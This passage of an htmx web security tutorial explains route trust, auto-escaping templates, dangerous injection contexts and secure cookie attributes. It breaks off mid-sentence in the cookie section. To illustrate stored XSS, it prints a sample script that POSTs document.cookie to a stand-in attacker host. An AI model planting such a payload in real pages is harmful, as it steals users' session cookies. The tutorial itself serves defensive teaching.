Web Security Basics using HTMX
Learn about what HTMX is and how you can use it.
As htmx has gotten more popular, it's reached communities who have never written server-generated HTML before. Dynamic HTML templating was, and still is, the standard way to use many popular web frameworks (like Rails, Django, and Spring), but it is a novel concept for those coming from Single-Page Application (SPA) frameworks (like React and Svelte), where the prevalence of JSX means you never write HTML directly.
But have no fear! Writing web applications with HTML templates is a slightly different security model, but it's no harder than securing a JSX-based application, and in some ways it's a lot easier.
Overview
These are web security basics with htmx, but they're (mostly) not htmx-specific: these concepts are important to know if you're putting any dynamic, user-generated content on the web.
For this guide, you should already have a basic grasp of the semantics of the web, and be familiar with how to write a backend server (in any language). For instance, you should know not to create GET routes that can alter the backend state. We also assume that you're not doing anything super fancy, like making a website that hosts other people's websites. If you're doing anything like that, the security concepts you need to be aware of far exceed the scope of this guide.
We make these simplifying assumptions in order to target the widest possible audience without including distracting information; obviously this can't catch everyone. No security guide is perfectly comprehensive. If you feel there's a mistake, or an obvious gotcha that we should have mentioned, please reach out and we'll update it.
The Golden Rules
Follow these four simple rules, and you'll be following the client security best practices:
- Only call routes you control
- Always use an auto-escaping template engine
- Only serve user-generated content inside HTML tags
- If you have authentication cookies, set them with Secure, HttpOnly, and SameSite=Lax
In the following section, we'll discuss what each of these rules does, and what kinds of attack they protect against. The vast majority of htmx users (those using htmx to build a website that allows users to log in, view some data, and update that data) should never have any reason to break them.
Understanding the Rules
Only call routes you control
This is the most basic one, and the most important: do not call untrusted routes with htmx.
In practice, this means you should only use relative URLs. This is fine:
<button hx-get="/events">Search events</button>
But this is not:
<button hx-get="https://google.com/search?q=events">Search events</button>
The reason for this is simple: htmx inserts the response from that route directly into the user's page. If the response has a malicious <script> inside it, that script can steal the user's data. When you don't control the route, you cannot guarantee that whoever does control the route won't add a malicious script.
Fortunately, this is a very easy rule to follow. Hypermedia APIs (i.e. HTML) are specific to the layout of your application, so there is almost never any reason you'd want to insert someone else's HTML into your page. All you have to do is make sure you only call your own routes (htmx 2 disables calling other domains by default).
Though it's not quite as popular these days, a common SPA pattern was to separate the frontend and backend into different repositories, and sometimes even to serve them from different URLs. This would require using absolute URLs in the frontend and, often, configuring permissive CORS headers to relax the browser's same-origin restrictions. With htmx (and, to be fair, modern React with Next.js) this is an anti-pattern.
Instead, you simply serve your HTML frontend from the same server (or at least the same domain) as your backend, and everything else falls into place: you can use relative URLs, you'll never have trouble with CORS, and you'll never call anyone else's backend.
htmx executes HTML; HTML is code; never execute untrusted code.
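One way to make the "only call routes you control" rule concrete is to check whether a URL resolves to your own origin. The following is a minimal sketch, not part of htmx: the helper name `isSameOrigin` and the `https://example.com` page URL are assumptions made for illustration. It relies only on the standard `URL` constructor.

```javascript
// Hypothetical helper (not an htmx API): returns true when `target`,
// resolved against the current page URL, stays on the page's own origin.
function isSameOrigin(target, pageUrl) {
  const page = new URL(pageUrl);
  let resolved;
  try {
    // Relative URLs such as "/events" are resolved against the page URL.
    resolved = new URL(target, page);
  } catch {
    // Unparseable URLs are treated as untrusted.
    return false;
  }
  return resolved.origin === page.origin;
}

// Assumed page URL, for illustration only.
const page = 'https://example.com/app';
console.log(isSameOrigin('/events', page));
console.log(isSameOrigin('https://google.com/search?q=events', page));
// Protocol-relative URLs look "relative" but point at another host.
console.log(isSameOrigin('//evil.example/events', page));
```

Note the third case: a URL starting with `//` is not a path on your server, which is why a plain leading-slash path like `/events` is the safest habit.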
Always use an auto-escaping template engine
When you send HTML to the user, all dynamic content must be escaped. Use a template engine to construct your responses, and make sure that auto-escaping is on.
Fortunately, all template engines support escaping HTML, and most of them enable it by default.
The kind of vulnerability this prevents is often called a Cross-Site Scripting (XSS) attack, a term that is broadly used to mean the injection of any unexpected content into your webpage. Typically, an attacker uses your APIs to store malicious code in your database, which you then serve to your other users who request that info.
For example, let's say you're building a dating site, and it lets users share a little bio about themselves. You'd render that bio like this, with {{ user.bio }} being the bio stored in the database:
<p>{{ user.bio }}</p>
If a malicious user wrote a bio with a script element in it (like one that sends the client's cookie to another website), then this HTML will get sent to every user who views that bio:
<p>
<script>
fetch("evilwebsite.com", { method: "POST", body: document.cookie });
</script>
</p>
Fortunately this one is so easy to fix that you can write the code yourself. Whenever you insert untrusted (i.e. user-provided) data, you just have to replace eight characters with their non-code equivalents. This is an example using JavaScript:
/**
 * Replace any characters that could be used to inject a malicious script
 * in an HTML context.
 */
export function escapeHtmlText (value) {
  const stringValue = value.toString()
  const entityMap = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
    '/': '&#x2F;',
    '`': '&#x60;',
    '=': '&#x3D;'
  }
  // Match any of the characters inside /[ ... ]/
  const regex = /[&<>"'`=\/]/g
  return stringValue.replace(regex, match => entityMap[match])
}
This tiny JS function replaces < with &lt;, " with &quot;, and so on. These characters will still render properly as < and " when they're used in the text, but can't be interpreted as code constructs. The previous malicious bio will now be converted into the following HTML:
<p>
&lt;script&gt;
fetch(&quot;evilwebsite.com&quot;, { method: &quot;POST&quot;, body: document.cookie });
&lt;&#x2F;script&gt;
</p>
which displays harmlessly as text.
Fortunately, as established above, you don't have to do your escaping manually; I just wanted to demonstrate how simple these concepts are. Every template engine has an auto-escaping feature, and you're going to want to use a template engine anyway. Just make sure that escaping is enabled, and send all your HTML through it.
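To make "auto-escaping" less abstract, here is a rough sketch of what a template engine does for you, written as a JavaScript tagged template. The `html` tag and the sample bio are hypothetical names invented for this illustration; a real template engine is the better choice in practice.

```javascript
// The eight characters to escape, mapped to their HTML entity equivalents.
const ENTITY_MAP = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
  '`': '&#x60;',
  '=': '&#x3D;'
};

// Escape a value for use as text inside an HTML element.
function escapeHtmlText(value) {
  return String(value).replace(/[&<>"'`=\/]/g, (match) => ENTITY_MAP[match]);
}

// Hypothetical tagged template: the literal parts are trusted markup,
// and every interpolated value is escaped automatically.
function html(strings, ...values) {
  let out = strings[0];
  values.forEach((value, i) => {
    out += escapeHtmlText(value) + strings[i + 1];
  });
  return out;
}

// Assumed user input, for illustration only.
const bio = '<script>alert(1)</script>';
const rendered = html`<p>${bio}</p>`;
console.log(rendered);
```

The point of the design is that the author of the template never has to remember to call the escaper: anything that is not part of the literal markup gets escaped by default.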
Only serve user-generated content inside HTML tags
This is an addendum to the template engine rule, but it's important enough to call out on its own. Do not allow your users to define arbitrary CSS or JS content, even with your auto-escaping template engine.
<!-- Don't include inside script tags -->
<script>
const userName = {{ user.name }}
</script>
<!-- Don't include inside CSS tags -->
<style>
h1 { color: {{ user.favorite_color }} }
</style>
And, don't use user-defined attributes or tag names either:
<!-- Don't allow user-defined tag names -->
<{{ user.tag }}></{{ user.tag }}>
<!-- Don't allow user-defined attributes -->
<a {{ user.attribute }}></a>
<!-- User-defined attribute VALUES are sometimes okay, it depends -->
<a class="{{ user.class }}"></a>
<!-- Escaped content is always safe inside HTML tags (this is fine) -->
<a>{{ user.name }}</a>
CSS, JavaScript, and HTML attributes are "dangerous contexts," places where it's not safe to allow arbitrary user input, even if it's escaped. Escaping will protect you from some vulnerabilities here, but not all of them; the vulnerabilities are varied enough that it's safest to default to not doing any of these.
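As a small illustration of why escaping is not enough inside a script tag, the sketch below runs a payload through the same eight-character escaper described earlier. The payload and variable names are assumptions chosen for the example. Because the payload contains none of the escaped characters, it passes through unchanged and would be emitted as live JavaScript.

```javascript
// Same eight-character escaper as described earlier in this guide.
const ENTITY_MAP = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
  "'": '&#x27;', '/': '&#x2F;', '`': '&#x60;', '=': '&#x3D;'
};
function escapeHtmlText(value) {
  return String(value).replace(/[&<>"'`=\/]/g, (match) => ENTITY_MAP[match]);
}

// Hypothetical attacker-chosen "name": valid JavaScript that contains
// no HTML special characters at all.
const userName = 'alert(document.cookie)';
const escaped = escapeHtmlText(userName);

// What a template like `const userName = {{ user.name }}` would emit
// inside a <script> element.
const emitted = `const userName = ${escaped}`;
console.log(escaped === userName);
console.log(emitted);
```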
Inserting user-generated text directly into a script tag should never be necessary, but there are some situations where you might let users customize their CSS or customize HTML attributes. Handling those properly will be discussed down below.
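For the cases where a user-chosen value does have to land in CSS, one common approach is to accept only values that match a strict allowlist rather than trying to escape them. This is a minimal sketch under that assumption; the helper name `safeHexColor` and the fallback color are hypothetical, and it only covers six-digit hex colors.

```javascript
// Hypothetical helper: accept only six-digit hex colors such as "#ff8800".
// Anything else, including attempts to break out of the CSS rule,
// is replaced by a fixed fallback.
function safeHexColor(input, fallback = '#000000') {
  const candidate = String(input);
  return /^#[0-9a-fA-F]{6}$/.test(candidate) ? candidate : fallback;
}

console.log(safeHexColor('#ff8800'));
console.log(safeHexColor('red; } body { display: none'));
```

The value is validated on the server before it ever reaches the template, so the template only sees strings that cannot contain CSS syntax.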
Secure your cookies
The best way to do authentication with htmx is using cookies. And because htmx encourages interactivity primarily through first-party HTML APIs, it is usually trivial to enable the browser's best cookie security features. These three in particular:
- Secure - only send the cookie via HTTPS, never HTTP
- HttpOnly - don't make the cookie available to JavaScript via document.cookie
- SameSite=Lax - don't allow other sites to use your cookie to make requests, unless it's just a plain link
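In practice, these three attributes are set by the server in the Set-Cookie response header. The sketch below builds such a header value by hand to show what it looks like; the function name, cookie name, and token value are assumptions for illustration, and most backend frameworks provide their own cookie helper that you should prefer.

```javascript
// Hypothetical helper: builds a Set-Cookie header value for a session
// token with the three recommended attributes.
function buildSessionCookie(name, value) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    'Path=/',
    'Secure',       // only sent over HTTPS
    'HttpOnly',     // not readable through document.cookie
    'SameSite=Lax'  // not sent on cross-site requests, except plain link navigation
  ].join('; ');
}

// Assumed cookie name and token, for illustration only.
console.log(buildSessionCookie('session', 'abc123'));
```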
To understand what these protect you against, let's go over the basics. If you come from JavaScript SPAs, where it's common to authenticate using the Authorization header, you might not be familiar with how cookies work. Fortunately they're very simple. (Please note: this is not an "authentication with htmx" tutorial, just an overview of cookie tokens generally.)
If your users log in with a
Last updated 17 Aug 2024, 12:31 +0200 .